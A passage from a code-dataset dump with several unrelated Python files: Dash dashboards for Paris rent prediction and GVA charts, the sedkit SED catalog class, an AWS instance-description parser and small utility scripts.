https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout\ncolumn1 = dbc.Col(\n [\n dcc.Markdown('## Predictions', className='mb-5'), \n dcc.Markdown('#### Latitude'), \n dcc.Slider(\n id = 'latitude',\n min=48.816990,\n max=48.900790,\n step=0.001,\n value=48.816990,\n marks = {48.816990: '48.816990', 48.900790: '48.900790'},\n className = 'mb-1' \n), \n \n dcc.Markdown('', id = 'out1'),\n \n dcc.Markdown('#### Longitude'),\n dcc.Slider(\n id = 'longitude',\n min=2.247990,\n max=2.427590,\n step=0.001,\n value=2.247990,\n marks = {2.247990: '2.247990', 2.427590: '2.427590'}, \n className = 'mb-1'\n),\n dcc.Markdown('', id = 'out2'),\n \n dcc.Markdown('#### Nights'), \n dcc.Dropdown(\n id='minimum_nights', \n options = [\n {'label': '1', 'value' : '1'}, {'label': '2', 'value' : '2'}, {'label': '3', 'value' : '3'}, \n {'label': '4', 'value' : '4'}, {'label': '5', 'value' : '5'}, {'label': '6', 'value' : '6'}, \n {'label': '7', 'value' : '7'}, {'label': '8', 'value' : '8'}, {'label': '9', 'value' : '9'},\n {'label': '10', 'value' : '10'}, {'label': '11', 'value' : '11'}, {'label': '12', 'value' : '12'},\n {'label': '13', 'value' : '13'}, {'label': '14', 'value' : '14'}, {'label': '15', 'value' : '15'},\n {'label': '16', 'value' : '16'}, {'label': '17', 'value' : '17'}, {'label': '18', 'value' : '18'},\n {'label': '19', 'value' : '19'}, {'label': '20', 'value' : '20'}, {'label': '21', 'value' : '21'},\n {'label': '22', 'value' : '22'}, {'label': '23', 'value' : '23'}, {'label': '24', 'value' : '24'},\n {'label': '25', 'value' : '25'}, {'label': '26', 'value' : '26'}, {'label': '27', 'value' : '27'},\n {'label': '28', 'value' : '28'}, {'label': '29', 'value' : '29'}, {'label': '30', 'value' : '30'},\n ], \n value = '1', \n className='mb-5', \n \n ), \n dcc.Markdown('#### Rent Type'), \n dcc.Dropdown(\n id='room_type', \n options = [\n {'label': 'Entire home/apt', 'value' : 'Entire home/apt'},\n {'label': 'Private room', 'value' : 'Private room'}, \n {'label': 'Hotel room', 'value' : 'Hotel room'}, \n {'label': 'Shared room', 'value' : 'Shared room'},\n ], \n value = 'Private room', \n className='mb-5', \n \n ), \n \n dcc.Markdown('#### Neighbourhood'), \n dcc.Dropdown(\n id='neighbourhood', \n options = [\n {'label': 'Buttes-Montmartre', 'value': 'Buttes-Montmartre'}, {'label': 'Popincourt', 'value': 'Popincourt'}, \n {'label': 'Entrepôt', 'value': 'Entrepôt'},{'label': 'Vaugirard', 'value': 'Vaugirard'}, \n {'label': 'Batignolles-Monceau', 'value': 'Batignolles-Monceau'}, {'label': 'Ménilmontant', 'value': 'Ménilmontant'}, \n {'label': 'Temple', 'value': 'Temple'}, {'label': 'Buttes-Chaumont', 'value': 'Buttes-Chaumont'}, \n {'label': 'Opéra', 'value': 'Opéra'}, {'label': 'Passy', 'value': 'Passy'},\n {'label': 'Bourse', 'value': 'Bourse'}, {'label': 'Reuilly', 'value': 'Reuilly'},\n {'label': 'Observatoire', 'value': 'Observatoire'}, {'label': 'Panthéon', 'value': 'Panthéon'},\n {'label': 'OHôtel-de-Ville', 'value': 'Hôtel-de-Ville'}, {'label': 'Luxembourg', 'value': 'Luxembourg'},\n {'label': 'Gobelins', 'value': 'Gobelins'}, {'label': 'Palais-Bourbon', 'value': 'Palais-Bourbon'},\n {'label': 'Élysée', 'value': 'Élysée'}, {'label': 'Louvre', 'value': 'Louvre'},\n ], \n value = 'Louvre', \n className='mb-5', \n ), \n ],\n md=4,\n)\n\ncolumn2 = dbc.Col(\n [ \n html.H2('Estimated rent in Paris: ', className='mb-5'), \n html.Div(id='prediction-content', className='lead', style={'fontSize': 40}), \n \n ]\n)\n\n\nlayout = dbc.Row([column1, column2])\n\n@app.callback(\n Output('prediction-content', 'children'),\n [Input('neighbourhood', 'value'),\n Input('latitude', 'value'),\n Input('longitude', 'value'),\n Input('room_type', 'value'),\n Input('minimum_nights', 'value')],\n)\ndef predict( neighbourhood, latitude, longitude, room_type, minimum_nights):\n df = pd.DataFrame(\n data=[[neighbourhood, latitude, longitude, room_type, minimum_nights]], \n columns=['neighbourhood', 'latitude', 'longitude','room_type', 'minimum_nights']\n )\n y_pred = pipeline.predict(df)[0]\n price_pred = np.expm1(y_pred)\n return f'${price_pred:.0f} '\n","sub_path":"pages/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"166692841","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objs as go\n\nfrom app import app\nimport pandas as pd\n\ndata = pd.read_excel('data/2018/economic-aggregates/S1.6.xlsx')\nyears = data.iloc[5:6, 2:-2]\n\nprocess = data[7:]\nsections = process.iloc[:, 0]\nmain_sections = [index for index in sections.index if sections[index].isdigit()]\nrows = [data.iloc[idx] for idx in main_sections]\nlabels = [row.iloc[-1] for row in rows]\nlabelIds = main_sections\n\nlayout = html.Div([\n html.H1('GVA Time Series'),\n dcc.Dropdown(\n id='my-dropdown',\n options=[{'label': category, 'value': labelIds[idx]} for (idx, category) in enumerate(labels)],\n value=labelIds[-1],\n style={'margin-bottom': '20px'}\n ),\n dcc.Graph(id='gva-time-series',\n style={'padding-top': '20px'})\n], className=\"container\")\n\n\n@app.callback(Output('gva-time-series', 'figure'),\n [Input('my-dropdown', 'value')])\ndef update_graph(selected_dropdown_value):\n index = int(selected_dropdown_value)\n row = data.iloc[index][2:-2]\n year_list = ['Y ' + year for year in years.values[0]]\n mid = int(len(row) / 2)\n return {\n 'data': [go.Bar(\n x=year_list[:mid],\n y=row[:mid],\n name='Current Price'\n ), go.Bar(\n x=year_list[mid:],\n y=row[mid:],\n name='Constant Price'\n )],\n 'layout': {\n 'title': data.iloc[index][-1]\n }\n }\n","sub_path":"apps/gva_time_series.py","file_name":"gva_time_series.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"397004362","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Joe Filippazzo, jfilippazzo@stsci.edu\n#!python3\n\"\"\"\nA module to produce a catalog of spectral energy distributions\n\"\"\"\n\nimport os\nimport pickle\nfrom copy import copy\nimport shutil\n\nfrom astropy.io import ascii\nimport astropy.table as at\nimport astropy.units as q\nimport numpy as np\nfrom bokeh.models import HoverTool, ColumnDataSource, LabelSet\nfrom bokeh.plotting import figure, show\nfrom bokeh.models.glyphs import Patch\n\nfrom .sed import SED\nfrom . import utilities as u\n\n\nclass Catalog:\n \"\"\"An object to collect SED results for plotting and analysis\"\"\"\n def __init__(self, name='SED Catalog', marker='circle', color='blue', verbose=True, **kwargs):\n \"\"\"Initialize the Catalog object\"\"\"\n # Metadata\n self.verbose = verbose\n self.name = name\n self.marker = marker\n self.color = color\n self.wave_units = q.um\n self.flux_units = q.erg/q.s/q.cm**2/q.AA\n\n # List all the results columns\n self.cols = ['name', 'ra', 'dec', 'age', 'age_unc', 'distance', 'distance_unc',\n 'parallax', 'parallax_unc', 'radius', 'radius_unc',\n 'spectral_type', 'spectral_type_unc', 'SpT',\n 'membership', 'reddening', 'fbol', 'fbol_unc', 'mbol',\n 'mbol_unc', 'Lbol', 'Lbol_unc', 'Lbol_sun',\n 'Lbol_sun_unc', 'Mbol', 'Mbol_unc', 'logg', 'logg_unc',\n 'mass', 'mass_unc', 'Teff', 'Teff_unc', 'Teff_evo',\n 'Teff_evo_unc', 'Teff_bb', 'SED']\n\n # A master table of all SED results\n self.results = self.make_results_table(self)\n\n # Try to set attributes from kwargs\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n def __add__(self, other, name=None):\n \"\"\"Add two catalogs together\n\n Parameters\n ----------\n other: sedkit.catalog.Catalog\n The Catalog to add\n\n Returns\n -------\n sedkit.catalog.Catalog\n The combined catalog\n \"\"\"\n if not type(other) == type(self):\n raise TypeError('Cannot add object of type {}'.format(type(other)))\n\n # Make a new catalog\n new_cat = Catalog(name=name or self.name)\n\n # Combine results\n new_results = at.vstack([at.Table(self.results), at.Table(other.results)])\n new_cat.results = new_results\n\n return new_cat\n\n def add_column(self, name, data, unc=None):\n \"\"\"\n Add a column of data to the results table\n\n Parameters\n ----------\n name: str\n The name of the new column\n data: sequence\n The data array\n unc: sequence (optional)\n The uncertainty array\n \"\"\"\n # Make sure column doesn't exist\n if name in self.results.colnames:\n raise ValueError(\"{}: Column already exists.\".format(name))\n\n # Make sure data is the right length\n if len(data) != len(self.results):\n raise ValueError(\"{} != {}: Data is not the right size for this catalog.\".format(len(data), len(self.results)))\n\n # Add the column\n self.results.add_column(data, name=name)\n\n # Add uncertainty column\n if unc is not None:\n\n # Uncertainty name\n name = name + '_unc'\n\n # Make sure column doesn't exist\n if name in self.results.colnames:\n raise ValueError(\"{}: Column already exists.\".format(name))\n\n # Make sure data is the right length\n if len(unc) != len(self.results):\n raise ValueError(\n \"{} != {}: Data is not the right size for this catalog.\".format(len(unc), len(self.results)))\n\n # Add the column\n self.results.add_column(unc, name=name)\n\n def add_SED(self, sed):\n \"\"\"Add an SED to the catalog\n\n Parameters\n ----------\n sed: sedkit.sed.SED\n The SED object to add\n \"\"\"\n # Turn off print statements\n sed.verbose = False\n\n # Check the units\n sed.wave_units = self.wave_units\n sed.flux_units = self.flux_units\n\n # Run the SED\n sed.make_sed()\n\n # Add the values and uncertainties if applicable\n new_row = {}\n for col in self.cols[:-1]:\n\n if col + '_unc' in self.cols:\n if isinstance(getattr(sed, col), tuple):\n val = getattr(sed, col)[0]\n else:\n val = None\n elif col.endswith('_unc'):\n if isinstance(getattr(sed, col.replace('_unc', '')), tuple):\n val = getattr(sed, col.replace('_unc', ''))[1]\n else:\n val = None\n else:\n val = getattr(sed, col)\n\n val = val.to(self.results[col.replace('_unc', '')].unit).value if hasattr(val, 'unit') else val\n\n new_row[col] = val\n\n # Add the SED\n new_row['SED'] = sed\n\n # Append apparent and absolute photometry\n for row in sed.photometry:\n\n # Add the column to the results table\n if row['band'] not in self.results.colnames:\n self.results.add_column(at.Column([np.nan] * len(self.results), dtype=np.float16, name=row['band']))\n self.results.add_column(at.Column([np.nan] * len(self.results), dtype=np.float16, name=row['band'] + '_unc'))\n self.results.add_column(at.Column([np.nan] * len(self.results), dtype=np.float16, name='M_' + row['band']))\n self.results.add_column(at.Column([np.nan] * len(self.results), dtype=np.float16, name='M_' + row['band'] + '_unc'))\n\n # Add the apparent magnitude\n new_row[row['band']] = row['app_magnitude']\n\n # Add the apparent uncertainty\n new_row[row['band'] + '_unc'] = row['app_magnitude_unc']\n\n # Add the absolute magnitude\n new_row['M_' + row['band']] = row['abs_magnitude']\n\n # Add the absolute uncertainty\n new_row['M_' + row['band'] + '_unc'] = row['abs_magnitude_unc']\n\n # Add the new row\n self.results.add_row(new_row)\n\n self.message(\"Successfully added SED '{}'\".format(sed.name))\n\n def export(self, parentdir='.', dirname=None, format='ipac', sources=True, zipped=False):\n \"\"\"\n Exports the results table and a directory of all SEDs\n\n Parameters\n ----------\n parentdir: str\n The parent directory for the folder or zip file\n dirname: str (optional)\n The name of the exported directory or zip file, default is SED name\n format: str\n The format of the output results table\n sources: bool\n Export a directory of all source SEDs too\n zipped: bool\n Zip the directory\n \"\"\"\n # Check the parent directory\n if not os.path.exists(parentdir):\n raise IOError('No such target directory', parentdir)\n\n # Check the target directory\n name = self.name.replace(' ', '_')\n dirname = dirname or name\n dirpath = os.path.join(parentdir, dirname)\n\n # Remove '.' from column names\n final = at.Table(self.results).filled(np.nan)\n for col in final.colnames:\n final.rename_column(col, col.replace('.', '_'))\n\n # Write a directory of results and all SEDs...\n if sources:\n\n # Make a directory\n if not os.path.exists(dirpath):\n os.system('mkdir {}'.format(dirpath))\n else:\n raise IOError('Directory already exists:', dirpath)\n\n # Export the results table\n resultspath = os.path.join(dirpath, '{}_results.txt'.format(name))\n final.write(resultspath, format=format)\n\n # Make a sources directory\n sourcedir = os.path.join(dirpath,'sources')\n os.system('mkdir {}'.format(sourcedir))\n\n # Export all SEDs\n for source in self.results['SED']:\n source.export(sourcedir)\n\n # zip if desired\n if zipped:\n shutil.make_archive(dirpath, 'zip', dirpath)\n os.system('rm -R {}'.format(dirpath))\n\n # ...or just write the results table\n else:\n resultspath = dirpath + '_results.txt'\n final.write(resultspath, format=format)\n\n def filter(self, param, value):\n \"\"\"Retrieve the filtered rows\n\n Parameters\n ----------\n param: str\n The parameter to filter by, e.g. 'Teff'\n value: str, float, int, sequence\n The criteria to filter by, \n which can be single valued like 1400\n or a range with operators [<,<=,>,>=],\n e.g. (>1200,<1400), ()\n\n Returns\n -------\n sedkit.sed.Catalog\n The filtered catalog\n \"\"\"\n # Make a new catalog\n cat = Catalog()\n cat.results = u.filter_table(self.results, **{param: value})\n\n return cat\n\n def from_file(self, filepath, run_methods=['find_2MASS'], delimiter=','):\n \"\"\"Generate a catalog from a file of source names and coordinates\n\n Parameters\n ----------\n filepath: str\n The path to an ASCII file\n run_methods: list\n A list of methods to run\n delimiter: str\n The column delimiter of the ASCII file\n \"\"\"\n # Get the table of sources\n data = ascii.read(filepath, delimiter=delimiter)\n\n self.message(\"Generating SEDs for {} sources from {}\".format(len(data), filepath))\n\n # Iterate over table\n for row in data:\n\n # Make the SED\n s = SED(row['name'], verbose=False)\n if 'ra' in row and 'dec' in row:\n s.sky_coords = row['ra']*q.deg, row['dec']*q.deg\n\n # Run the desired methods\n s.run_methods(run_methods)\n\n # Add it to the catalog\n self.add_SED(s)\n\n def get_data(self, *args):\n \"\"\"Fetch the data for the given columns\n \"\"\"\n results = []\n\n for x in args:\n\n # Get the data\n if '-' in x:\n x1, x2 = x.split('-')\n if self.results[x1].unit != self.results[x2].unit:\n raise TypeError('Columns must be the same units.')\n\n xunit = self.results[x1].unit\n xdata = self.results[x1] - self.results[x2]\n xerror = np.sqrt(self.results['{}_unc'.format(x1)]**2 + self.results['{}_unc'.format(x2)]**2)\n\n else:\n xunit = self.results[x].unit\n xdata = self.results[x]\n xerror = self.results['{}_unc'.format(x)]\n\n # Append to results\n results.append([xdata, xerror, xunit])\n\n return results\n\n def get_SED(self, name_or_idx):\n \"\"\"Retrieve the SED for the given object\n\n Parameters\n ----------\n idx_or_name: str, int\n The name or index of the SED to get\n \"\"\"\n # Add the index\n self.results.add_index('name')\n\n # Get the rows\n if isinstance(name_or_idx, str) and name_or_idx in self.results['name']:\n return copy(self.results.loc[name_or_idx]['SED'])\n\n elif isinstance(name_or_idx, int) and name_or_idx <= len(self.results):\n return copy(self.results[name_or_idx]['SED'])\n\n else:\n self.message('Could not retrieve SED {}'.format(name_or_idx))\n\n return\n\n def load(self, file):\n \"\"\"Load a saved Catalog\"\"\"\n if os.path.isfile(file):\n\n f = open(file)\n cat = pickle.load(f)\n f.close()\n\n f = open(file, 'rb')\n cat = pickle.load(f)\n f.close()\n\n self.results = cat\n\n @staticmethod\n def make_results_table(self):\n \"\"\"Generate blank results table\"\"\"\n results = at.QTable(names=self.cols, dtype=['O'] * len(self.cols))\n results.add_index('name')\n\n # Set the units\n results['age'].unit = q.Gyr\n results['age_unc'].unit = q.Gyr\n results['distance'].unit = q.pc\n results['distance_unc'].unit = q.pc\n results['parallax'].unit = q.mas\n results['parallax_unc'].unit = q.mas\n results['radius'].unit = q.Rsun\n results['radius_unc'].unit = q.Rsun\n results['fbol'].unit = q.erg / q.s / q.cm ** 2\n results['fbol_unc'].unit = q.erg / q.s / q.cm ** 2\n results['Lbol'].unit = q.erg / q.s\n results['Lbol_unc'].unit = q.erg / q.s\n results['mass'].unit = q.Msun\n results['mass_unc'].unit = q.Msun\n results['Teff'].unit = q.K\n results['Teff_unc'].unit = q.K\n results['Teff_bb'].unit = q.K\n results['Teff_evo'].unit = q.K\n results['Teff_evo_unc'].unit = q.K\n\n return results\n\n def message(self, msg, pre='[sedkit.Catalog]'):\n \"\"\"\n Only print message if verbose=True\n\n Parameters\n ----------\n msg: str\n The message to print\n pre: str\n The stuff to print before\n \"\"\"\n if self.verbose:\n if pre is None:\n print(msg)\n else:\n print(\"{} {}\".format(pre, msg))\n\n def plot(self, x, y, marker=None, color=None, scale=['linear','linear'],\n xlabel=None, ylabel=None, fig=None, order=None, identify=None,\n id_color='red', label_points=False, exclude=None, draw=True, **kwargs):\n \"\"\"Plot parameter x versus parameter y\n\n Parameters\n ----------\n x: str\n The name of the x axis parameter, e.g. 'SpT'\n y: str\n The name of the y axis parameter, e.g. 'Teff'\n marker: str (optional)\n The name of the method for the desired marker\n color: str (optional)\n The color to use for the points\n scale: sequence\n The (x,y) scale for the plot\n xlabel: str\n The label for the x-axis\n ylable : str\n The label for the y-axis \n fig: bokeh.plotting.figure (optional)\n The figure to plot on\n order: int\n The polynomial order to fit\n identify: idx, str, sequence\n Names of sources to highlight in the plot\n id_color: str\n The color of the identified points\n label_points: bool\n Print the name of the object next to the point\n\n Returns\n -------\n bokeh.plotting.figure.Figure\n The figure object\n \"\"\"\n # Grab the source and valid params\n source = copy(self.source)\n params = [k for k in source.column_names if not k.endswith('_unc')]\n\n # If no uncertainty column for parameter, add it\n if '{}_unc'.format(x) not in source.column_names:\n _ = source.add([None] * len(self.source.data['name']), '{}_unc'.format(x))\n if '{}_unc'.format(y) not in source.column_names:\n _ = source.add([None] * len(self.source.data['name']), '{}_unc'.format(y))\n\n # Check if the x parameter is a color\n if '-' in x and all([i in params for i in x.split('-')]):\n colordata = self.get_data(x)[0]\n if len(colordata) == 3:\n _ = source.add(colordata[0], x)\n _ = source.add(colordata[1], '{}_unc'.format(x))\n params.append(x)\n\n # Check if the y parameter is a color\n if '-' in y and all([i in params for i in y.split('-')]):\n colordata = self.get_data(y)[0]\n if len(colordata) == 3:\n _ = source.add(colordata[0], y)\n _ = source.add(colordata[1], '{}_unc'.format(y))\n params.append(y)\n\n # Check the params are in the table\n if x not in params:\n raise ValueError(\"'{}' is not a valid x parameter. Please choose from {}\".format(x, params))\n if y not in params:\n raise ValueError(\"'{}' is not a valid y parameter. Please choose from {}\".format(y, params))\n\n # Make the figure\n if fig is None:\n\n # Tooltip names can't have '.' or '-'\n xname = source.add(source.data[x], x.replace('.', '_').replace('-', '_'))\n yname = source.add(source.data[y], y.replace('.', '_').replace('-', '_'))\n\n # Set up hover tool\n tips = [('Name', '@name'), (x, '@{}'.format(xname)), (y, '@{}'.format(yname))]\n hover = HoverTool(tooltips=tips, names=['points'])\n\n # Make the plot\n TOOLS = ['pan', 'reset', 'box_zoom', 'wheel_zoom', 'save', hover]\n title = '{} v {}'.format(x, y)\n fig = figure(plot_width=800, plot_height=500, title=title, y_axis_type=scale[1], x_axis_type=scale[0], tools=TOOLS)\n\n # # Exclude sources\n # if exclude is not None:\n # exc_idx = [i for i, v in enumerate(source.data['name']) if v in exclude]\n # patches = {x : [(i, np.nan) for i in exc_idx],\n # y : [(i, np.nan) for i in exc_idx]}\n #\n # source.patch(patches)\n\n # Get marker class\n size = kwargs.get('size', 8)\n kwargs['size'] = size\n marker = getattr(fig, marker or self.marker)\n color = color or self.color\n marker(x, y, source=source, color=color, fill_alpha=0.7, name='points', **kwargs)\n\n # Plot y errorbars\n yval, yerr = source.data[y], source.data['{}_unc'.format(y)]\n yval[yval == None] = np.nan\n yerr[yerr == None] = np.nan\n y_err_x = [(i, i) for i in source.data[x]]\n y_err_y = [(i, j) for i, j in zip(yval - yerr, yval + yerr)]\n fig.multi_line(y_err_x, y_err_y, color=color)\n\n # Plot x errorbars\n xval, xerr = source.data[x], source.data['{}_unc'.format(x)]\n xval[xval == None] = np.nan\n xerr[xerr == None] = np.nan\n x_err_y = [(i, i) for i in source.data[y]]\n x_err_x = [(i, j) for i, j in zip(xval - xerr, xval + xerr)]\n fig.multi_line(x_err_x, x_err_y, color=color)\n\n # Label points\n if label_points:\n labels = LabelSet(x=x, y=y, text='name', level='glyph', x_offset=5, y_offset=5, source=source, render_mode='canvas')\n fig.add_layout(labels)\n\n # Fit polynomial\n if isinstance(order, int):\n\n # Only fit valid values\n idx = [n for n, (i, j) in enumerate(zip(xval, yval)) if not hasattr(i, 'mask') and not np.isnan(i) and not hasattr(j, 'mask') and not np.isnan(j)]\n xd = np.array(xval, dtype=float)[idx]\n yd = np.array(yval, dtype=float)[idx]\n\n # Plot data\n label = 'Order {} fit'.format(order)\n xaxis = np.linspace(min(xd), max(xd), 100)\n coeffs = None\n\n # Fit the polynomial\n try:\n\n if yerr is not None:\n ye = np.array(yerr, dtype=float)[idx]\n coeffs, cov = np.polyfit(x=xd, y=yd, deg=order, w=1./ye, cov=True)\n else:\n coeffs, cov = np.polyfit(x=xd, y=yd, deg=order, cov=True)\n\n # Plot the line\n if coeffs is None or any([np.isnan(i) for i in coeffs]):\n self.message(\"Could not fit that data with an order {} polynomial\".format(order))\n else:\n\n # Calculate values and 1-sigma\n TT = np.vstack([xaxis**(order-i) for i in range(order + 1)]).T\n yaxis = np.dot(TT, coeffs)\n C_yi = np.dot(TT, np.dot(cov, TT.T))\n sig = np.sqrt(np.diag(C_yi))\n\n # Plot the line and shaded error\n fig.line(xaxis, yaxis, legend=label + ' {}'.format(coeffs[::-1]), color=color, line_alpha=0.3)\n xpat = np.hstack((xaxis, xaxis[::-1]))\n ypat = np.hstack((yaxis + sig, (yaxis - sig)[::-1]))\n err_source = ColumnDataSource(dict(xaxis=xpat, yaxis=ypat))\n glyph = Patch(x='xaxis', y='yaxis', fill_color=color, line_color=None, fill_alpha=0.1)\n fig.add_glyph(err_source, glyph)\n\n except Exception as exc:\n print(\"Skipping the polynomial fit: {}\".format(exc))\n\n # Set axis labels\n xunit = source.data[x].unit\n yunit = source.data[y].unit\n fig.xaxis.axis_label = '{}{}'.format(x, ' [{}]'.format(xunit) if xunit else '')\n fig.yaxis.axis_label = '{}{}'.format(y, ' [{}]'.format(yunit) if yunit else '')\n\n # Formatting\n fig.legend.location = \"top_right\"\n\n # Identify sources\n if isinstance(identify, list):\n id_cat = Catalog('Identified')\n for obj_id in identify:\n obj_result = self.get_SED(obj_id)\n if str(type(obj_result)) != \"\":\n obj_result = [obj_result]\n for obj in obj_result:\n id_cat.add_SED(obj)\n fig = id_cat.plot(x, y, fig=fig, size=size+5, marker='circle', line_color=id_color, fill_color=None, line_width=2, label_points=True)\n del id_cat\n\n if draw:\n show(fig)\n\n return fig\n\n def plot_SEDs(self, name_or_idx, scale=['log', 'log'], normalize=None, **kwargs):\n \"\"\"Plot the SED for the given object or objects\n\n Parameters\n ----------\n idx_or_name: str, int, sequence\n The name or index of the SED to get\n scale: sequence\n The [x, y] scale to plot, ['linear', 'log']\n normalized: bool\n Normalize the SEDs to 1\n \"\"\"\n COLORS = u.color_gen('Category10')\n\n # Plot all SEDS\n if name_or_idx in ['all', '*']:\n name_or_idx = list(range(len(self.results)))\n\n # Make it into a list\n if isinstance(name_or_idx, (str, int)):\n name_or_idx = [name_or_idx]\n\n # Make the plot\n TOOLS = ['pan', 'reset', 'box_zoom', 'wheel_zoom', 'save']\n title = self.name\n fig = figure(plot_width=800, plot_height=500, title=title,\n y_axis_type=scale[1], x_axis_type=scale[0],\n x_axis_label='Wavelength [{}]'.format(self.wave_units),\n y_axis_label='Flux Density [{}]'.format(str(self.flux_units)),\n tools=TOOLS)\n\n # Plot each SED\n for obj in name_or_idx:\n c = next(COLORS)\n targ = self.get_SED(obj)\n fig = targ.plot(fig=fig, color=c, output=True, normalize=normalize, legend=targ.name, **kwargs)\n\n return fig\n\n def remove_SED(self, name_or_idx):\n \"\"\"Remove an SED from the catalog\n\n Parameters\n ----------\n name_or_idx: str, int\n The name or index of the SED to remove\n \"\"\"\n # Add the index\n self.results.add_index('name')\n\n # Get the rows\n if isinstance(name_or_idx, str) and name_or_idx in self.results['name']:\n self.results = self.results[self.results['name'] != name_or_idx]\n\n elif isinstance(name_or_idx, int) and name_or_idx <= len(self.results):\n self.results.remove_row([name_or_idx])\n\n else:\n self.message('Could not remove SED {}'.format(name_or_idx))\n\n return\n\n def save(self, file):\n \"\"\"Save the serialized data\n\n Parameters\n ----------\n file: str\n The filepath\n \"\"\"\n path = os.path.dirname(file)\n\n if os.path.exists(path):\n\n # Make the file if necessary\n if not os.path.isfile(file):\n os.system('touch {}'.format(file))\n\n # Write the file\n f = open(file, 'wb')\n pickle.dump(self.results, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n\n self.message('Catalog saved to {}'.format(file))\n\n @property\n def source(self):\n \"\"\"Generates a ColumnDataSource from the results table\"\"\"\n # Remove SED column\n results_dict = {key: val for key, val in dict(self.results).items() if key != 'SED'}\n\n return ColumnDataSource(data=results_dict)\n","sub_path":"sedkit/catalog.py","file_name":"catalog.py","file_ext":"py","file_size_in_byte":24418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"327385948","text":"import pandas as pd\n\nfrom agents.serializer import AgentsSerializer\n\n\ndef add_data():\n df = pd.read_csv('agents/agents.csv')\n for k in range(len(df)):\n dt = dict(df.loc[k])\n data = AgentsSerializer(data=dt)\n\n if data.is_valid():\n data.save()\n\n return \"done\"","sub_path":"agents/add_agents_data.py","file_name":"add_agents_data.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488227480","text":"import argparse\nimport re\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"spec_file\")\nargs = parser.parse_args()\n\nspec_file = args.spec_file\n\nwith open(spec_file) as fh:\n lines = fh.readlines()\n\n# Possible values to search for\n# Name: %{name_name}\n# Name: name_name\nfor line in lines:\n if re.search(\"Name.*:\", line):\n name = line.split(\":\")[1].strip()\n break\nelse:\n print(\"Did not find name in spec file\")\n exit(1)\n\n# If name value is a macro\n# e.g.\n# %global name_name projectname\n# Name: %{name_name}\nif re.search(\"%\\{.+\\}\", name):\n name_ = name.replace(\"%\", \"\").replace(\"{\", \"\").replace(\"}\", \"\")\n for line in lines:\n if \"%global\" in line and name_ in line:\n line_ = re.sub(\" {2,}\", \" \", line.strip())\n name = line.split()[-1]\n break\n\nprint(name)\n","sub_path":"files/artifact-name.py","file_name":"artifact-name.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177525401","text":"n = int(input())\nw = list(map(int, input().split()))\ncenter = sum(w)//2\nsml = 0\ni = 0\nwhile sml < center:\n sml += w[i]\n i += 1\ni -= 1\nsmr = sum(w)-sml\nif sml-smr > smr+w[i]-(sml-w[i]):\n print(smr+w[i]-(sml-w[i]))\nelse:\n print(sml-smr)","sub_path":"ABC/129/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"376352355","text":"from .ResponseParser import *\nfrom ..Util.Tags import *\n\n\n# responsible for parsing describe instances response\nclass DescribeInstancesParser(ResponseParser):\n # sg (security group) is for filtering nodes\n def __init__(self, reponse=None):\n ResponseParser.__init__(self, reponse)\n\n def setResponse(self, response):\n self.response = response\n\n def _getPrivateIp(self, i):\n if not i[\"NetworkInterfaces\"]: return \"N/A\"\n return i[\"NetworkInterfaces\"][0].get(\"PrivateIpAddress\")\n\n def _getPublicIp(self, i):\n if not i[\"NetworkInterfaces\"]: return \"N/A\"\n return i[\"NetworkInterfaces\"][0].get(\"Association\", {\"PublicIp\": \"N/A\"})[\"PublicIp\"]\n\n def _getSecurityGroups(self, i):\n return [j[\"GroupName\"] for j in i[\"SecurityGroups\"]]\n\n def _getTagName(self, i):\n for j in i:\n if j[\"Key\"] == TAG_ROLE: return j[\"Value\"]\n return \"N/A\"\n\n # return list of instances\n def listDetails(self):\n instances = []\n for i in self.response[\"Reservations\"]:\n for j in i[\"Instances\"]:\n instances.append(j)\n return [\n {\n \"InstanceId\": i[\"InstanceId\"],\n \"PublicIp\": self._getPublicIp(i),\n \"PrivateIpAddress\": self._getPrivateIp(i),\n \"Role\": self._getTagName(i.get(\"Tags\", [])),\n \"State\": i.get(\"State\", [{\"Value\": \"N/A\"}])\n }\n for i in instances if i[\"State\"][\"Name\"] not in [\"terminated\", \"shutting-down\"]\n ]\n\n def _getClusterIDs(self, i):\n for j in i:\n if j[\"Key\"] == TAG_CLUSTERID: return j[\"Value\"]\n\n def _getClusterDesc(self,i):\n for j in i:\n if j[\"Key\"] == TAG_CLUSTERDESC: return j[\"Value\"]\n return \"\"\n\n def _getUser(self,i):\n for j in i:\n if j[\"Key\"] == TAG_USER: return j[\"Value\"]\n return \"\"\n\n def listClusterIDs(self):\n instances = []\n for i in self.response[\"Reservations\"]:\n for j in i[\"Instances\"]:\n instances.append(j)\n return list(set([\n (self._getClusterIDs(i.get(\"Tags\", [])), self._getClusterDesc(i.get(\"Tags\",[])), self._getUser(i.get(\"Tags\",[])))\n for i in instances\n if i[\"State\"][\"Name\"] not in [\"terminated\", \"shutting-down\"]\n ]))\n\n def getClusterDesc(self):\n instances = []\n for i in self.response[\"Reservations\"]:\n for j in i[\"Instances\"]:\n instances.append(j)\n tags = instances[0][\"Tags\"]\n return self._getClusterDesc(tags)\n","sub_path":"server/JmeterAwsConf/Parser/DescribeInstancesParser.py","file_name":"DescribeInstancesParser.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649824902","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 18 